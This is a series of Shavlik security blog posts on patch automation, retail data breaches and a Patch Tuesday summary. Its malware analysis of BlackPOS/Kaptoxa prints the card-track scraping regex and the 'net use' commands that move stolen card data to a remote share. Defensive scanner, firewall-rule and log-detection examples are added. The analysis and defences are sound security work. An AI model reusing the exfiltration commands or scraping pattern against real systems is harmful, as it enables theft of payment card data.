PAC Helps Drive the Future of Shavlik Products

Last week, the Shavlik Product Advisory Council (PAC) met for a two-day, onsite meeting at the Shavlik office in Minneapolis.

During this event, PAC members learned more about Shavlik’s strategy and roadmap, reviewed and also test-drove Shavlik Protect 9.2, and most importantly, provided insight and guidance on Shavlik’s product direction.

Thanks to all PAC members for your participation in this event!

In the photos below, (top) PAC members discussed upcoming features in Protect 9.2; (middle) A PAC member shares his idea for an ideal security dashboard; (bottom) It wasn’t all work as PAC members and members of the Shavlik team take in a rare Twins win at Target Field.






The Communicator’s Corner: Automated Patching for Busy People

We all know by now how important it is to patch our computers to keep bad things from happening. We also know that most IT administrators are extremely busy and don’t have the time, or inclination, to devote themselves to this admittedly mundane, but critical, task. So what’s the answer? Automation.

Automation is the perfect solution for performing what would otherwise be a tedious task. Take for example the latest trend with retirement plans. Until recently, if an employee wanted to participate in the company retirement plan, they were forced to work through a mountain of paperwork on their own, and all too often people just gave up. So, many companies have decided to move away from the “opt in” approach and are instead offering automatic enrollment plans. It is human nature to take the path of least resistance, so by automating the desired path and forcing employees to manually opt out, rather than opt in, HR folks have noticed a much higher rate of participation in retirement plans. (Yea!)

The same principle holds true when it comes to implementing your patch process; it is much more likely to happen if it is automated. So is there a tool that provides automated patching and that secures your computers almost without thinking? Yes, and it is called Shavlik Protect.

How to automate your patching process using scheduled scans and deployments

The Shavlik Protect interface makes it extremely easy to set up scheduled patch scans and deployments on the machines in your organization. Using a few basic features (such as machine groups, scan templates, and deployment templates), you can easily configure Shavlik Protect to automatically perform recurring scheduled scans and to automatically deploy any missing patches that it detects during a scan. Doing so creates a completely automated patch scan and deployment operation.

Want to know how it is done? This screenshot probably tells you most of what you need to know.

(Screenshot: Automated Patching for Busy People)

But if you are like me, and you like to know all the details, check out our video on how to automate scheduled patching. You can find it here:

Unattended Consoles

Let’s take things one step further. First, a lead-in: If you happen to work in an organization with many office sites located across the country or around the world, you might be (you should be!) using multiple Shavlik Protect consoles. You can set things up so that the machines at a central site (probably your company headquarters) are managed by a central console, while the machines at your remote sites are managed by remote consoles. The data rollup feature can then be used so that the central console receives data about the machines being managed by the remote consoles.

With the stage now set, wouldn’t it be nice not to have to worry about any ongoing administration tasks at your remote consoles?  Well, once again, with Shavlik Protect you can! You can automate the system by implementing an unattended console at each remote site. An unattended console is a console you set up once. After that the console automatically updates its own files and manages its machines without human assistance.

Here’s how it works: The unattended console is configured to automatically perform periodic scans and to automatically deploy any patches it detects as missing on its target machines (see above). The console will also contain a patch scan template that is defined to look for a particular set of patches. The set of patches is contained in a patch list that resides on a distribution server. (Distribution servers were discussed in a previous blog article.)

Now, when new patches are released by a vendor (for example, the monthly patches released by Microsoft Corporation), you simply update the patch list on the distribution server. When the unattended console performs its next scheduled scan it will automatically reference the updated list and will patch its target machines, all without human intervention.

The following figure illustrates an unattended console configuration.

(Figure: Automated Patching for Busy People 2, showing the Rollup console, the Managed machines, the Unattended console, the Distribution server and the Patch list.)


Patch Management Automation: Turning a Weakness Into a Strength

One of the single greatest challenges that IT professionals face today is the arduous task of keeping up with the constant bombardment of new vulnerabilities. According to the folks at NIST (the National Institute of Standards and Technology), in 2013 the total number of new vulnerabilities that were identified eclipsed 5,186.

That breaks down to 14 new vulnerabilities a day, which, without the appropriate level of patch management, makes the challenge of managing this situation almost insurmountable! With the continuous flow of new software technology and the constantly changing network landscape (physical, virtual and mobile…), the challenges associated with patch management will continue.

There is hope! The challenges associated with patch management will continue to persist, but by injecting the proper level of automation into the mix, what was once an unmanageable issue can be easily contained. So…if you’re reading this post, and the situation I just described sounds familiar, there is a solution.

If you’re not able to keep up with the challenges associated with patch management, you should consider introducing technology that will automate this process for you, saving both time and money. Most importantly, it will help remove what today is an unknown level of risk which can provide peace of mind, and let you move on to address more pressing and important priorities. To learn more about what you can do to address the ongoing challenges associated with patch management and patch management automation, visit:

Consumers Beware: Protect Yourselves from Security Breaches

In this blog series on security breaches, we’ve talked a lot about what retailers can do to secure their IT infrastructures and to protect customer data. However, in today’s environment, it is impossible for any company, not to mention a retailer, to be 100% secure. The question isn’t IF your favorite store will get hacked; the question is WHEN your favorite store will get hacked.

Given this reality, let’s turn our attention to what we as consumers can do to protect ourselves. Following three basic practices will limit your risk of exposure to nearly zero, and means you can continue blissfully shopping at all of your favorite stores, regardless of whether or not you’ve seen their name in the paper recently.

#1 – Ditch the debit cards

As I was first venturing into the adult world, one piece of financial advice my dad gave me was, “Debit cards are evil.” It was the late ‘90s, so data breaches and BlackPOS weren’t top of mind. Heck, e-commerce was just kicking off then. He was thinking about old school things like earning interest in your checking account, earning cash back from credit cards, and the risk of the card being lost or stolen.

Fast forward to today’s environment and Dad’s advice is better than ever. If a debit card number is compromised, your checking account can be emptied and your money inaccessible while you go through what can be a lengthy process of disputing the charge. With credit cards, on the other hand, you are not obligated to make payments that are under dispute, so the disputed funds stay with you. In reality your only risk from a compromised credit card number is the inconvenience of having to update auto-payments if your credit card company issues a new number. That is if you do #2…

#2 – Review your statements carefully

We as consumers do have an obligation to review our credit card statements each month and to promptly report any erroneous charges. In doing so, be especially mindful of small charges, say $0.05, that might be testing the viability of your card number. That type of charge is an early indicator that your credit card number has fallen into the hands of evil, so don’t let the size of the charge keep you from reporting it.

By carefully reviewing your credit card statement each month and reporting any charges that don’t seem right, you shift the responsibility for unauthorized charges from yourself to your credit card company.

#3 – Don’t stress out about the headlines

Working for a security software company, I get questioned a lot about retail security breaches by friends and family. When Target came under fire last fall, a lot of folks asked if I was going to stop shopping there and if they should stop too. The thought of not shopping at Target had never crossed my mind. Shoot, I live in Minnesota; I’d give up hockey before giving up Target.

Seriously, though, if you’ve followed the steps above, there’s little if any effect on you if your credit card info is compromised. You don’t need to stop shopping at a store because you see its name in the paper. Swipe away and leave the worry to your favorite retailer’s IT department.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do to protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now



Retailers Beware: a Swipe of the Credit Card Could Swipe your Data

In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information. Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level, to where we discuss the technology that is causing this wave of cyber-theft.

To begin with, let’s discuss the attacks. In years past, you would typically hear about companies that leaked information from a central point. A typical example: hackers would try to infiltrate a network and then go after servers that they could tell housed critical databases containing customer information. After taking control of that system, through whatever means they used, they’d then use various mechanisms of exfiltration to take that data and send it offsite all in one fell swoop.

The challenge with these types of attacks is that cyber-security has advanced through the years to make this more difficult. IT administrators first identify their “primary targets” on networks where data is stored. Then, they create various levels of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP security around it to make sure that if the data was compromised it couldn’t freely flow off the server into the wrong hands. The quick gist, though, is that it is increasingly difficult for hackers to find servers that are vulnerable and then exploit them without detection.

The challenge with the most recent wave of attacks is that the hacking community has realized that these attacks are difficult, and once again the law of governing dynamics for cyber-warfare has taken over. That law states:

1)  Attacks will trend towards the most vulnerable machines on a network.

2)  Attacks will trend towards the most vulnerable software on a network.

3)  Attacks will trend towards the most valuable data on a network.

This has forced a change in the way in which hackers go about exploiting vulnerabilities and how they get data off of a network.


Fast-forward to the current day, where cyber security is a challenge. We have already discussed that most of your server administrators are securing servers with patching and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector, though, you know that there are cash-register terminals (Point of Sale systems) out there that are handling the transactions with customers, and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale software, and they are collecting credit cards at a rate of over 97% of consumer transactions. This is where things get interesting for hackers.

Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.

This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.

We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.


First off, Kaptoxa has to make it onto your network. In general, the most direct approach for this to happen is an unsecure or unpatched machine, where hackers are able to gain access to your network with some sort of elevated privileges. After they get onto the network, they begin to spread Kaptoxa around via a number of freely available scripts on the internet that identify the Point-Of-Sale (POS) systems and then infect them.

After infection, Kaptoxa begins to operate with two different processes. The first process attaches itself to the POS application and begins to look for credit card information, and the second process runs periodically, starting up to offload the captured information to external servers.

For the first process, Kaptoxa does something so simple and effective it’s scary. It attaches to the running POS process and reads its memory. During normal operation of the program, the POS application reads credit card information in from a card swipe reader. This data is in an incredibly uniform pattern that resembles something like this:


And this is the problem! The data is so uniform that if I can attach myself to a process and look at its memory, at some point a credit card track will be visible to me just by scanning the memory and looking for that pattern. While that sounds tough, a rough scrape of that information can easily be done with a simple grep command using a pattern that looks like this:

(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))

So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last bit it’ll do is store it somewhere on the hard drive so it can pick it up later. In some of the early variants, it placed it right into the Windows System directory in a falsely named DLL file and just stored it in plain text.

With the main process running, Kaptoxa is constantly looking for more data to exploit and dropping it into a directory for it to be sent off later. That file will just continue to grow over time. The role of the second process is to wake up occasionally and extract the data offsite. The Kaptoxa process is again simplistic in its approach to date, using basic SMB/CIFS file-share mapping to connect a drive on a remote internet server that is set up for open sharing, then copying the file and removing the share. While the approach has differed by variant, the command syntax for execution will look something like:

net use L: \\<[X.X.X.X]>\c$\WINDOWS\twain_32 /user:<[User]> <[Password]>
move <Windows>\system32\winxml.dll L:\<[Machine Name]><[Day]><[Month]><[Hour]>.txt
net use L: /del

The script above connects a drive mapping called “L:” to a remote server, moves the file and then deletes the file share after it is done. A quick execution of this process later and the file is gone and your data has been extracted.


First off, I’d be remiss if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, they wouldn’t have been compromised in the first place. The one thing to mention here is that you shouldn’t just protect your servers; your workstations need to be patched and managed too to prevent this. At the same time, if it has already happened, you want to be prepared too.

In all the variants we’ve seen so far, there are two ways to protect yourself that target a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure you don’t have card data sitting on your POS hard drive or in the registry. There is a very simple way to take the regular expression that I listed above and put it into a PowerShell script that scans your Windows files and finds the same signature that Kaptoxa is looking for. If you find it on your hard drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you clean up the malware.
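Here is an added example of the file-scanning check just described, written in Python rather than PowerShell so it runs on any platform; it is not code from this post or from Shavlik. It compiles the track-data signature quoted above (with the backslashes the pattern needs), scans a buffer or a whole directory tree for it, and reports only a masked card number for each hit so the scanner itself never writes a full PAN anywhere. The SAMPLE_DUMP and CLEAN_BUFFER inputs are constructed for the example; 4111111111111111 is a well-known test card number, and the cardholder and discretionary data are made up.

```python
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# The track 1 + track 2 signature from the post, compiled against bytes so it can be
# run over binary files (a memory dump, or a "DLL" that is really a text drop file).
TRACK_DATA_RE = re.compile(
    rb"(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}/[A-Za-z\s]{0,26}\^"
    rb"(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}"
    rb"([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))"
)

Hit = Tuple[int, str]  # (byte offset in the buffer or file, masked PAN)


def mask_pan(pan: bytes) -> str:
    """Keep only the first six and last four digits so the scanner never prints a full PAN."""
    text = pan.decode("ascii")
    return text[:6] + "*" * (len(text) - 10) + text[-4:]


def find_track_data(data: bytes) -> List[Hit]:
    """Return one (offset, masked PAN) per track 1 + track 2 record found in a buffer."""
    hits: List[Hit] = []
    for m in TRACK_DATA_RE.finditer(data):
        pan = m.group(6).split(b"=", 1)[0]  # group 6 is the track 2 part: PAN=YYMM...
        hits.append((m.start(), mask_pan(pan)))
    return hits


def scan_file(path: Path, chunk_size: int = 1 << 20, overlap: int = 256) -> List[Hit]:
    """Scan a file in chunks. The overlap is longer than any one record, so a record that
    straddles a chunk boundary is still found; `seen` drops the duplicate the overlap creates."""
    hits: List[Hit] = []
    seen = set()
    tail = b""
    offset = 0
    with path.open("rb") as fh:
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            buf = tail + chunk
            base = offset - len(tail)
            for rel, masked in find_track_data(buf):
                if base + rel not in seen:
                    seen.add(base + rel)
                    hits.append((base + rel, masked))
            tail = buf[-overlap:]
            offset += len(chunk)
    return hits


def scan_tree(root: Path, max_size: int = 256 << 20) -> Dict[str, List[Hit]]:
    """Walk a directory tree and map each file that holds track data to its hits."""
    report: Dict[str, List[Hit]] = {}
    for path in root.rglob("*"):
        try:
            if not path.is_file() or path.stat().st_size > max_size:
                continue
            hits = scan_file(path)
        except OSError:  # unreadable or locked file: skip it rather than abort the sweep
            continue
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample input: some binary noise around one track 1 + track 2 record.
SAMPLE_DUMP = (
    b"\x00\x01MZ garbage before the record "
    b"%B4111111111111111^DOE/JOHN^25121011234567890?"
    b";4111111111111111=25121011234567890?"
    b" more garbage\x00"
)
CLEAN_BUFFER = b"order 1234 total 19.99 paid by card ending 1111"

if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. the POS system's Windows directory
        for name, hits in scan_tree(Path(sys.argv[1])).items():
            print(f"{name}: {len(hits)} record(s), first {hits[0][1]} at offset {hits[0][0]}")
    else:
        print(find_track_data(SAMPLE_DUMP), find_track_data(CLEAN_BUFFER))
```

Run it with a directory argument to sweep that tree; with no argument it demonstrates itself on the constructed buffers. It only inspects files on disk, which is exactly the check the post suggests: a hit means card data is being stored where PCI says it must not be, and the masked output is enough to locate the file without copying the data again.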

The second prevention method is more of a network approach, but barring specific reasons, there is no reason why one of your POS systems should be attaching a network drive to an off-company IP address. To put a hard stop on this, a brute-force deny rule can be added to your firewall using the general format of:

Block: TCP
Port: 445
From: Internal
To: External IP

If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.
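As an added example, not from this post, of what the rule above catches, here is a small Python detector that applies the same “internal source, external destination, TCP 445” test to flow or firewall log lines, so you can see which connections the rule would have blocked before you switch it on. It goes slightly beyond the post’s rule by also treating the NetBIOS session port 139 as SMB. The log format, the INTERNAL_NETS ranges and the SAMPLE_LOG lines are all constructed for the example; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

# Ranges treated as "internal". Constructed for the example; a real rule set would name
# the POS VLANs and corporate ranges explicitly rather than all of RFC 1918.
INTERNAL_NETS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# SMB/CIFS: direct-hosted on 445, and over the NetBIOS session service on 139.
SMB_PORTS = {445, 139}


@dataclass
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Parse one record of the constructed format '<timestamp> <src> <dst> <proto> <dport>'."""
    ts, src, dst, proto, dport = line.split()
    return Flow(ts, src, dst, proto.upper(), int(dport))


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)  # raises ValueError on a malformed address
    return any(ip in net for net in INTERNAL_NETS)


def is_outbound_smb(flow: Flow) -> bool:
    """The post's rule: TCP to an SMB port, from an internal address to an external one."""
    return (
        flow.proto == "TCP"
        and flow.dport in SMB_PORTS
        and is_internal(flow.src)
        and not is_internal(flow.dst)
    )


def detect_outbound_smb(log_text: str) -> List[Flow]:
    """Return the flows in a log that a 'block internal -> external SMB' rule would stop."""
    alerts: List[Flow] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            flow = parse_flow(line)
            flagged = is_outbound_smb(flow)
        except ValueError:  # malformed record: skip it rather than abort the run
            continue
        if flagged:
            alerts.append(flow)
    return alerts


# Constructed sample log: one internal file-server copy, one POS terminal mapping a
# share on an internet host over 445, an HTTPS flow, a UDP flow, and a 139 mapping.
SAMPLE_LOG = """\
2014-09-20T02:13:05 10.20.5.41 10.20.0.10 TCP 445
2014-09-20T02:13:07 10.20.5.41 203.0.113.25 TCP 445
2014-09-20T02:13:09 10.20.5.42 198.51.100.7 TCP 443
2014-09-20T02:14:11 10.20.5.43 203.0.113.25 UDP 445
2014-09-20T02:15:30 10.20.5.44 203.0.113.25 TCP 139
"""

if __name__ == "__main__":
    for f in detect_outbound_smb(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> {f.dst}:{f.dport}/{f.proto}  outbound SMB, should be blocked")
```

Only the second and fifth sample lines are flagged: internal-to-internal SMB, HTTPS, and UDP traffic all pass. Running this over a day of real logs before enabling the deny rule tells you whether any legitimate process (a backup agent, say) would be caught, which is the case for the country-filter alternative mentioned above.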


So, let me just say this blog isn’t just for Retail. What started as swiping swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:

1)  Prevent threats from getting on their network by protecting servers AND WORKSTATIONS with patching and anti-malware technologies.

2)  Prevent data theft by implementing more specific rules on key areas and equipment on their network to block data exfiltration.


September Patch Tuesday Round-Up

This month may have been a light release from Microsoft, but there were still plenty of updates to deploy. Microsoft released four security updates, one of which was critical, resolving 42 vulnerabilities. On the non-Microsoft front, there were releases from Adobe and Google to take note of. Adobe Flash had a Patch Tuesday release resulting in an IE advisory and a Google Chrome release to update the Flash plug-in. The Flash update resolved 12 vulnerabilities. There were no security updates for Office this month, but there were 18 non-security updates. One of those has run into some issues and had to be pulled. Here is a priority breakdown for security updates this month and details on known issues:

Shavlik Priority 1 Updates (Priority 1 updates should be applied as soon as possible):

  • MS14-052: Cumulative Security Update for Internet Explorer (2977629) – This update is rated as critical by Microsoft. It resolves 37 vulnerabilities which could allow for remote code execution. The updates are all relating to memory corruption issues. One of the vulnerabilities resolved (CVE-2013-7331) has been exploited in targeted attacks in the wild. There are a large number of vulnerabilities and one publicly exploited making this a high priority for update.
  • APSB14-21: Security updates available for Adobe Flash Player – This update is rated as a Priority 1 by Adobe. The update resolves 12 vulnerabilities which have a variety of impacts including memory corruption, bypass of memory randomization, code execution, bypass of the same-origin policy, and security feature bypass.
  • MSAF-029: Microsoft Security Advisory: update for vulnerabilities in Adobe Flash in Internet Explorer – This update allows Internet Explorer to support the latest Adobe Flash release which resolves 12 vulnerabilities and is rated as a Priority 1 by Adobe.
  • CHROME-111: Chrome 37.0.2062.120 – Resolves four vulnerabilities including one high priority vulnerability. The update also includes support for the latest Adobe Flash plug-in which puts it up in the priority list for this month.

Shavlik Priority 2 Updates (Priority 2 updates should be tested and rolled out in a reasonable time frame, typically within 10-30 days of release):

  • MS14-053: Vulnerability in .Net Framework could allow Denial of Service – This update resolves one privately reported vulnerability which could lead to a DoS, but by default an install of .Net will not be vulnerable to this vulnerability. The flaw is exposed if ASP.NET is installed and registered with an IIS server. This would require the customer to install ASP.NET manually.
  • MS14-054: Vulnerability in Windows Task Scheduler could allow for elevation of privilege – This update resolves one privately reported vulnerability in Microsoft Windows which could allow for elevation of privilege. The attacker must, however, have a valid logon credential and be able to log on locally to exploit this vulnerability.
  • MS14-055: Vulnerabilities in Microsoft Lync Server could allow Denial of Service – This update resolves three privately reported vulnerabilities in Microsoft Lync Server. The attacker must send a specially crafted request to the Lync Server to exploit this vulnerability.

Watch List:

  • Adobe delayed release of APSB14-20 – The update will be a Priority 1 from Adobe as it resolves several critical vulnerabilities. The release was delayed to the week of September 15, meaning it will drop any day now. Once it does, you can expect to bump this up to the Priority list for rolling out this month.
  • Office non-security patch pulled by Microsoft – Microsoft did not release any security updates for Office this month, but 18 non-security updates have been released. An issue was discovered with KB2889866, an update for OneDrive, which would cause syncing to another user’s library to fail and moving of links, etc., to no longer be picked up by sync.

For access to Shavlik’s Patch Tuesday webinar or presentation you can go to our webinars page and check out the ‘Recent Webinars’ section and click view. You can also sign up for the October Patch Tuesday webinar where we will discuss the Patch Tuesday release for all of the critical apps that affect you.

Security Breaches Everywhere: Keeping Your Company Out of the Headlines

Lately, it seems not a day goes by without news of a security breach dominating the headlines. The Target breach last fall set off waves of copycat attacks that still, nearly a year later, are successfully infiltrating the networks of prominent retailers. Recently, we’ve seen the likes of P.F. Chang, Dairy Queen, and Minneapolis-based SUPERVALU join the ranks of hacked retailers.

I sat down with Rob Juncker to chat about these hacks and the unique challenges that companies in certain businesses, like retail and health care, face in securing their environments. In addition to being the Vice President of R&D here at Shavlik, Rob also dabbles in white hat hacking.


Anne:  Rob, the Target breach really got our attention as both consumers and as an industry. Now, nearly a year later, what do we know about the Target breach? How did it happen?

Rob:  We know an external hacker managed to take control and infiltrate Target’s system by way of a very unsecure node that was allowed to operate on their network. This was a complicated attack because they infiltrated a node, jumped onto Target’s network, and then had ample time to search the network, to find vulnerabilities, and to infect machines.

They infected the machines by injecting BlackPOS. It located point of sale (POS) devices, looked for specific processes on those machines, stared into their memory, and tried to match data formatted in the same manner that credit card tracks are formatted. After it found credit card data, BlackPOS sent it out of Target’s network to a location where the hackers could grab it.

Anne:  One thing that really stands out there is that they attacked a more or less forgotten node and not the data center. As an IT community, we invest so much of our energy into securing the data center, but from this example we see that isn’t enough.

Rob:  Most people focus on securing the most important assets within their network. The entire Target hack happened on the least valuable parts of the network – a computer designed for remote diagnostics as well as POS’s which are typically the cheapest nodes and the cheapest OS’s. These hackers could have never gained access to Target’s core databases, but they didn’t have to. They simply attacked the nodes where the data is collected.

Anne:  Do retailers face unique challenges in securing their IT infrastructure?

Rob:  Retailers have incredibly complex environments – all of these terminals out on a WAN in all of these stores. Nobody in IT is hands-on because every store can’t have its own IT department, and the devices are running various OS’s that have various third-party applications resident on them. This makes for a perfect storm for retailers to be exploited. Health care providers have similar complexity when you think about all of the nodes spread out throughout a hospital or a clinic.

Anne:  Here at Shavlik we are quick to share the figure that 75% of vulnerabilities exploited in the wild already have software updates (patches) available to fix them. How important is patch management in preventing these types of breaches?

Rob:  If you aren’t properly patched, someone can use off-the-shelf scripts to get access to that network. The Target hack was a professional hack. They knew what they were doing. That was the first, but all of these others are simple variants of the same approach. This has gone from being the work of an experienced hacker to that of a script kiddie. It is now readily repeatable, and we have a population of hackers attacking every site they can find.

Patch management is an important piece of having a full security profile for your entire network. Exploiting a known vulnerability is step one of the process. If you can reduce the ease of doing that, hackers are likely to move on to someone else.

Anne:  Most IT departments are disciplined about patching their data center servers with tools like Shavlik Protect and patching endpoint OS’s with tools like Microsoft System Center Configuration Manager (SCCM). Let’s assume the OS is up-to-date. Is that good enough?

Rob:  No. Because they have POS’s running a Windows OS, it is guaranteed there are third-party applications running on those devices. It could be an embedded internet browser or an embedded PDF generator. Worse, it could be Java which is the most exploited third-party application.

The existence of third-party apps isn’t a “maybe;” it is a “for sure.” CIO’s around the world should ask themselves, “It’s great that we patch Windows, but do we patch everything else?” If the answer is “no,” are you willing to bet your job on that decision?

Anne:  Of course CIO’s don’t want to risk their jobs over something as simple as third-party app patching, but given the complexity of their networks, are IT departments for retailers faced with a lose/lose decision between knowingly remaining unsecure versus spending all of their time on patching?

Rob:  For those companies who have SCCM, Shavlik Patch for Microsoft System Center makes the decision easy. With Shavlik Patch retailers can patch third-party applications from within SCCM in the same manner in which they patch the OS. They can also completely automate the process which means they can get into a “set and forget” mode for applying third-party updates. Third-party patching doesn’t have to be a difficult or arduous process. If it feels that way, Shavlik can help you out.


Patch management is critical, but it is just one piece of the security puzzle. In the next post in this series, Rob will dig deeper into the technical details of the Target hack, discuss how you can determine if BlackPOS already exists in your environment, and explain how you can cut off its communication lines if/when it finds its way into your network.

Also, if you’d like to join a discussion on this topic, Shavlik will be hosting a webinar on September 30.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now

Updating Your Patch Process

When is the last time your patch process was dusted off and updated? Have you accounted for virtualization, BYOD, and Shadow IT in your process? How frequently are you updating your virtual infrastructure? What is your policy around ensuring updates are applied to BYOD devices that are introduced to your environment or have access to your data? How does your policy apply to applications introduced outside of the IT department?

Things have changed significantly in the past few years. The demands of the user have changed the threat landscape for IT. You now have a number of new threats and ways to be exposed that you may not have a lot of control over. So how are you dealing with these issues? Have you taken steps to update existing policies to account for software installed on devices not owned by IT? How about devices owned by IT being audited regularly to ensure software purchased outside of IT is being maintained?

If you haven’t, you are not alone. Most companies are just trying to keep up with the pace of their users and the constant changes to their environment. Many companies are still trying to mature their process to handle more than the OS and the standard Microsoft applications. Dependencies on critical applications that are sensitive to changes in software can be difficult, and will hinder the ability to move forward with a progressive policy and strategy for handling today’s threat landscape.

According to Gartner’s “Improve Patch Management” article, written last year by Ronni Colville, an organization will shift from reactive to proactive as it matures its processes.  Companies that are still reacting to critical security updates and zero day threats are likely still operating at the ‘Awareness’ or ‘Committed’ levels. Advancing to ‘Proactive’ or higher takes some effort and commitment from the entire business. Policies need to be properly documented and communicated to all teams from Security and Audit to operations and business lines or application owners. The teams all need to be committed to the process and management needs to support this commitment. The correct tools also need to be in place to support the platforms and applications in the organization. These tools should also give you the level of visibility needed to report up the organization, ensuring all parties get the proper level of visibility in the process and progress going forward.

So what is holding you back? The most common reasons I hear for a company to struggle with maturing their patch processes are:

  • Not all teams are supporting the process. In many cases one or more business lines or application owners will not allow applications to be updated that could cause them an outage. This is an obvious and very difficult issue to overcome, as these are typically the business-critical apps that the company relies on most. This is also one of the reasons that Java Runtime is one of the most unpatched applications in your environment. 91 percent of web exploits involve a version of Java, and the vast majority of those are versions that are outdated or have reached end of life.
  • In some companies, the virtualization admin is outside of the operations team and not governed by the same policies. This is a common gap that leaves the virtual infrastructure unpatched. That means the hypervisors running multiple virtual machines are potentially vulnerable, and in the case of VMware, the tools on each of the VMs are out of date and potentially vulnerable.
  • Free tools like WSUS are considered ‘good enough’. Unfortunately, the products it covers fall into the 20 percent bucket for applications targeted by opportunistic hackers. With the average user being able to install their own applications, highly vulnerable products like Adobe Reader, Flash, Oracle Java, Apple iTunes, Google Chrome, and Mozilla Firefox all go unmanaged or require manual effort from the IT Ops team. So far in 2014 Adobe has released a Priority 1 update for Flash on seven of eight patch days.
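A first step toward the regular audit the post asks for is simply knowing which of these user-installed products are present and at what version. The script below is an added example, not Shavlik's code or part of Shavlik Protect: it reads the standard Uninstall registry keys on a Windows host (64-bit, 32-bit and per-user), matches the product names the post lists, and reports whether each installed version meets a minimum. The name patterns are constructed from the post's list, and the minimum versions are placeholders to be replaced with whatever your patch policy currently requires.

```powershell
# Added example (not Shavlik's code): inventory the third-party products the post
# names as frequently unmanaged and compare installed versions against a policy
# minimum. Assumes a Windows host; reads the Uninstall registry keys that most
# installers populate (an app that installs elsewhere will not appear here).

$UninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

# Product name patterns constructed from the post's list. Minimum versions are
# PLACEHOLDERS ('0.0'): set them from your policy or the vendor's release notes.
$Watchlist = @(
    @{ Pattern = 'Adobe Reader|Acrobat Reader'; Minimum = '0.0' },
    @{ Pattern = 'Adobe Flash Player';          Minimum = '0.0' },
    @{ Pattern = 'Java \d+ Update|Java\(TM\)';  Minimum = '0.0' },
    @{ Pattern = 'iTunes';                      Minimum = '0.0' },
    @{ Pattern = 'Google Chrome';               Minimum = '0.0' },
    @{ Pattern = 'Mozilla Firefox';             Minimum = '0.0' }
)

function Get-WatchlistInventory {
    # One row per registry entry that has a DisplayName; everything else is noise.
    $installed = Get-ItemProperty -Path $UninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

    foreach ($entry in $Watchlist) {
        $found = $installed | Where-Object { $_.DisplayName -match $entry.Pattern }
        if (-not $found) {
            # Not present on this host: nothing to patch, but useful for coverage reports.
            [pscustomobject]@{ Product = $entry.Pattern; Version = $null; Status = 'NotInstalled' }
            continue
        }
        foreach ($app in $found) {
            $status = 'Unknown'          # DisplayVersion is free text; parse defensively
            $installedVersion = $null
            $cleaned = $app.DisplayVersion -replace '[^\d.]', ''
            if ([version]::TryParse($cleaned, [ref]$installedVersion)) {
                $status = if ($installedVersion -ge [version]$entry.Minimum) { 'AtOrAboveMinimum' } else { 'BelowMinimum' }
            }
            [pscustomobject]@{
                Product = $app.DisplayName
                Version = $app.DisplayVersion
                Status  = $status
            }
        }
    }
}

# Sort so BelowMinimum and Unknown rows surface first for review.
Get-WatchlistInventory | Sort-Object Status, Product | Format-Table -AutoSize
```

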